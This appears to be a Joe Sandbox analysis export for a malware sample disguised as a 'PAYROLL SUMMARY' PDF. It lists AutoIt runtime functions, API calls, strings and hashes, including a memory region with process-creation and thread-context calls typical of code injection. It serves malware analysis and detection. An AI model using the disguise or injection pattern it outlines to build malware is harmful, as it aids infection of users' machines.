Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d50465569a358886c021122ea07802f18a09a16e48bd25dc3c371bd5f4309ba5
Instruction ID: dac222f050766737aa6250b799455b7d60a6048df0acc2b2baf6c1d6697996d1
Opcode Fuzzy Hash: d50465569a358886c021122ea07802f18a09a16e48bd25dc3c371bd5f4309ba5
Instruction Fuzzy Hash: 9F21E4B1D11318AFDB41DFE4E949BDDBBF8FB08701F00812AF911A62A0D7B149448F95

Function 002571EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00254864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003162F8,?,002537C0,?), ref: 00254882

Part of subcall function 0027074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,002572C5), ref: 00270771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00257308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0028ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0028ED32
RegCloseKey.ADVAPI32(?), ref: 0028ED70
_wcscat.LIBCMT ref: 0028EDC9

Strings

Include, xrefs: 0028ECE8, 0028ED29
\Include\, xrefs: 002572C5
\, xrefs: 0028EDEC
Software\AutoIt v3\AutoIt, xrefs: 002572FE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 16ce5a5f95bbcb76cabac249aa06f1dadf569ca63b061741cf602ca8ac8f495e
Instruction ID: 6ab0edd962c1e5511cb6b0a8bdf6a588051f50a2192883422a11ef07764c1bb8
Opcode Fuzzy Hash: 16ce5a5f95bbcb76cabac249aa06f1dadf569ca63b061741cf602ca8ac8f495e
Instruction Fuzzy Hash: AE717D714693019EC715EF25EC8189BB7FCFF59350F48882EF845832A0EB70996ACB56

Function 00253633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 002536D2
KillTimer.USER32(?,00000001), ref: 002536FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0025371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025372A
CreatePopupMenu.USER32 ref: 0025373E
PostQuitMessage.USER32(00000000), ref: 0025375F

Strings

TaskbarCreated, xrefs: 00253725
%., xrefs: 0028D2D1, 0028D31F

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%.
API String ID: 129472671-2498375929
Opcode ID: fefc568bb5431d7ab8d37169257e36e9d83d6e6079fe556d9b7df0fbf875d1ea
Instruction ID: 0d85753fe65724d0a7ef51e061e21cdc42400f9457d9725beb24ed8cfd12eb7b
Opcode Fuzzy Hash: fefc568bb5431d7ab8d37169257e36e9d83d6e6079fe556d9b7df0fbf875d1ea
Instruction Fuzzy Hash: E2414BB5630106BBDB15EF64EC0ABF9775CE708382F141529FD02822E1CAB09E79976D

Function 00253A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00253A62
LoadCursorW.USER32(00000000,00007F00), ref: 00253A71
LoadIconW.USER32(00000063), ref: 00253A88
LoadIconW.USER32(000000A4), ref: 00253A9A
LoadIconW.USER32(000000A2), ref: 00253AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00253AD2
RegisterClassExW.USER32(?), ref: 00253B28

Part of subcall function 00253041: GetSysColorBrush.USER32(0000000F), ref: 00253074
Part of subcall function 00253041: RegisterClassExW.USER32(00000030), ref: 0025309E
Part of subcall function 00253041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
Part of subcall function 00253041: InitCommonControlsEx.COMCTL32(?), ref: 002530CC
Part of subcall function 00253041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
Part of subcall function 00253041: LoadIconW.USER32(000000A9), ref: 002530F2
Part of subcall function 00253041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101

Strings

0, xrefs: 00253B06
#, xrefs: 00253B0D
AutoIt v3, xrefs: 00253B17

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 3a073bb1da58b4502b25ece85f88088302f194128ea41b26506cc37a8ac10a98
Instruction ID: 94e49130ca5f140aa5a2f4a8ec10ffb972f0ecca5391e70dcdfa6ef8ff5c9160
Opcode Fuzzy Hash: 3a073bb1da58b4502b25ece85f88088302f194128ea41b26506cc37a8ac10a98
Instruction Fuzzy Hash: D7213C70D11304AFEB129FA4ED0ABDD7BB8FB0C711F00852AE504A62A0D7B65A55CF48

Function 00253778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/ErrorStdOut, xrefs: 0025388F
CMDLINERAW, xrefs: 0025380D
CMDLINE, xrefs: 00253834
b1, xrefs: 0028D44E
/AutoIt3ExecuteScript, xrefs: 002538CE
/AutoIt3ExecuteLine, xrefs: 002538B9
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 002537C0
/AutoIt3OutputDebug, xrefs: 002538A4

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b1
API String ID: 1825951767-457443653
Opcode ID: 9f1932a8f2166a7815d992b656763229a0623c2a47fc23a6d3e704f061f2e475
Instruction ID: 7b90a382f91946eeedfe8509c1b53edc9b3e2a3c56916d0e55268b8070e987e4
Opcode Fuzzy Hash: 9f1932a8f2166a7815d992b656763229a0623c2a47fc23a6d3e704f061f2e475
Instruction Fuzzy Hash: 8EA14F718202299ACF05EFA0CC969EEB7B8BF14341F44442AF816B7191DB749A6DCF64

Function 0025F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002703A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002703D3
Part of subcall function 002703A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 002703DB
Part of subcall function 002703A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002703E6
Part of subcall function 002703A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002703F1
Part of subcall function 002703A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 002703F9
Part of subcall function 002703A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00270401

Part of subcall function 00266259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0025FA90), ref: 002662B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0025FB2D
OleInitialize.OLE32(00000000), ref: 0025FBAA
CloseHandle.KERNEL32(00000000), ref: 002949F2

Strings

\d1, xrefs: 0025F957
c1, xrefs: 0025F94B
%., xrefs: 0025F8F6, 0025F908, 0025FACE, 0025FBB1
<g1, xrefs: 0025FA90

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <g1$\d1$%.$c1
API String ID: 1986988660-374475462
Opcode ID: b083b7291b89e4ae871f2a7181be7221c6c6b876dcb9040f824f60476f515999
Instruction ID: 29a12e363d892856d151c276b68e5bcc190450c346fdb71fc6779f7fbf378674
Opcode Fuzzy Hash: b083b7291b89e4ae871f2a7181be7221c6c6b876dcb9040f824f60476f515999
Instruction Fuzzy Hash: 7981DAB49112408ED38ADFEAED576D4BAEDEB8C308B11C57E9419C72B2EB314458CF18

Function 03DC25F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03DC26C1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03DC28E7

Memory Dump Source

Source File: 00000000.00000002.2150148278.0000000003DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3dc0000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: dcb4f46b178e98f138f1ba7f6bd7dfe220e41843333d49a0f6fd1ee17a568336
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 73A1F674E2024AEBDF14CFA4C894BEEB7B5BF48704F248559E501BB280D7799A41CFA4

Function 002539E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00253A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00253A36
ShowWindow.USER32(00000000,?,?), ref: 00253A4A
ShowWindow.USER32(00000000,?,?), ref: 00253A53

Strings

edit, xrefs: 00253A30
AutoIt v3, xrefs: 00253A0D, 00253A12, 00253A13

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 3086a95e3d7eb3443014238f9a57721dc3cd512bda94aa3e639f7ef0b342c342
Instruction ID: 2ca2c35b60160f10e0239c92bb38c580f42cf635441c1d964e0d4937d9baf1b6
Opcode Fuzzy Hash: 3086a95e3d7eb3443014238f9a57721dc3cd512bda94aa3e639f7ef0b342c342
Instruction Fuzzy Hash: 66F03A70A012907EEA3217636C0EEA72E7DD7CAF50F01842AB900A2270C2B50C12CAB4

Function 03DC23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03DC22A0: Sleep.KERNELBASE(000001F4), ref: 03DC22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03DC24E9

Strings

YGNWSX5HD5OUC, xrefs: 03DC254C, 03DC254F

Memory Dump Source

Source File: 00000000.00000002.2150148278.0000000003DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3dc0000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CreateFileSleep
String ID: YGNWSX5HD5OUC
API String ID: 2694422964-4151547988
Opcode ID: 2d7024600613308990fe9ce568a1fb7fbeb4f9d1773264b2c126280477cbdf68
Instruction ID: be9544b78c70f5f6fc138731cedbae01f1be1327b40139f958b16cb12737de1c
Opcode Fuzzy Hash: 2d7024600613308990fe9ce568a1fb7fbeb4f9d1773264b2c126280477cbdf68
Instruction Fuzzy Hash: 55519E34D24289EBEF11DBA4C815BEFBB79EF18700F104598E209BB2C0DA795B45CB65

Function 0025410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0028D5EC

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

_memset.LIBCMT ref: 0025418D
_wcscpy.LIBCMT ref: 002541E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002541F1

Strings

Line: , xrefs: 0028D615

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: cbd6d336c76b739663b9f1ffeeacd60089e0e5efe8a04648d582ccc198345187
Instruction ID: 3485344f3e8c5d4c842059b86e3eda08f329e1e290712de001b5ad660748bb30
Opcode Fuzzy Hash: cbd6d336c76b739663b9f1ffeeacd60089e0e5efe8a04648d582ccc198345187
Instruction Fuzzy Hash: 1C31F7310283045AD322FB60EC46FDB73ECAF44305F10891AF98992091DB74A6ADCB9B

Function 0027564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 002756AB
_memcpy_s.LIBCMT ref: 0027571D
__read_nolock.LIBCMT ref: 0027577B
__filbuf.LIBCMT ref: 0027579E
_memset.LIBCMT ref: 002757E2

Part of subcall function 00278D68: __getptd_noexit.LIBCMT ref: 00278D68

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 4704e9535c69d164ad692ba2fd26497108561b0a70f618968e37d657cfbdd0a3
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: AA518634A20B26DBDB289E69888566EF7A5AF40320F64C729E82D961D0D7F09D718F40

Function 002569CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00254F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,003162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254F6F

_free.LIBCMT ref: 0028E68C
_free.LIBCMT ref: 0028E6D3

Part of subcall function 00256BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00256D0D

Strings

Bad directive syntax error, xrefs: 0028E6BB
>>>AUTOIT SCRIPT<<<, xrefs: 0028E462

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: d9ceb29d81ddb1352108fb962aaf66f3bfa25943e8823ddc0aeafd5d394b526a
Instruction ID: bb84983cd8a140514129f1faee31215403d846042dbf6e55898627e37262b4aa
Opcode Fuzzy Hash: d9ceb29d81ddb1352108fb962aaf66f3bfa25943e8823ddc0aeafd5d394b526a
Instruction Fuzzy Hash: BE917F75930229DFCF04EFA4C8919EDB7B8BF15314F14442AF815AB291EB749928CF54

Function 002535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002535A1,SwapMouseButtons,00000004,?), ref: 002535D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,002535A1,SwapMouseButtons,00000004,?,?,?,?,00252754), ref: 002535F5
RegCloseKey.KERNELBASE(00000000,?,?,002535A1,SwapMouseButtons,00000004,?,?,?,?,00252754), ref: 00253617

Strings

Control Panel\Mouse, xrefs: 002535D2

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 20d02c0009e48378c3b0d77738316feddcfc5f0ae7e8a3b24f1677bb022afdd0
Instruction ID: 31cec260d37ed567aef6a01631f15da5a0f4ab2ab1e5251848f3776cd14cb6f2
Opcode Fuzzy Hash: 20d02c0009e48378c3b0d77738316feddcfc5f0ae7e8a3b24f1677bb022afdd0
Instruction Fuzzy Hash: 45115A71921209BFDB20CF64EC44EAEB7BCEF04781F00946AF805D7210D2719F649768

Function 03DC12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03DC1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DC1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DC1B13

Memory Dump Source

Source File: 00000000.00000002.2150148278.0000000003DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3dc0000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction ID: 8780e65d1ae3819f9d07c69627873fd26cba39d28e344cbced1cdae5653579f1
Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction Fuzzy Hash: 66621A30A24259DBEB24CFA4C850BDEB376EF58700F1091A9D10DEB391E7799E81CB59

Function 002B97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00255045: _fseek.LIBCMT ref: 0025505D

Part of subcall function 002B99BE: _wcscmp.LIBCMT ref: 002B9AAE
Part of subcall function 002B99BE: _wcscmp.LIBCMT ref: 002B9AC1

_free.LIBCMT ref: 002B992C
_free.LIBCMT ref: 002B9933
_free.LIBCMT ref: 002B999E

Part of subcall function 00272F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00279C64), ref: 00272FA9
Part of subcall function 00272F95: GetLastError.KERNEL32(00000000,?,00279C64), ref: 00272FBB

_free.LIBCMT ref: 002B99A6

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: 7f9c199c9fabec108272d0d144bffbae187047e09721a23e44783598c8c381a3
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: 785160B1914628AFDF249F64CC41ADEBBB9EF48300F0044AEF649A7281DB715E94CF59

Function 0027493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002749D0
__flush.LIBCMT ref: 002749F0
__write.LIBCMT ref: 00274A23
__flsbuf.LIBCMT ref: 00274A51

Part of subcall function 00278D68: __getptd_noexit.LIBCMT ref: 00278D68

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: c3529ee5dc4b76c270797b771abd925f1b8f3b9e99b7afd20f97e188737a4428
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: E341E531660607DBDF28AE69C89196F77A9EF80360B24C16DE95D87640D770DD608B44

Function 00254DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00254E1A

Strings

EA06, xrefs: 0028DCF5
AU3!P/., xrefs: 00254E14

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
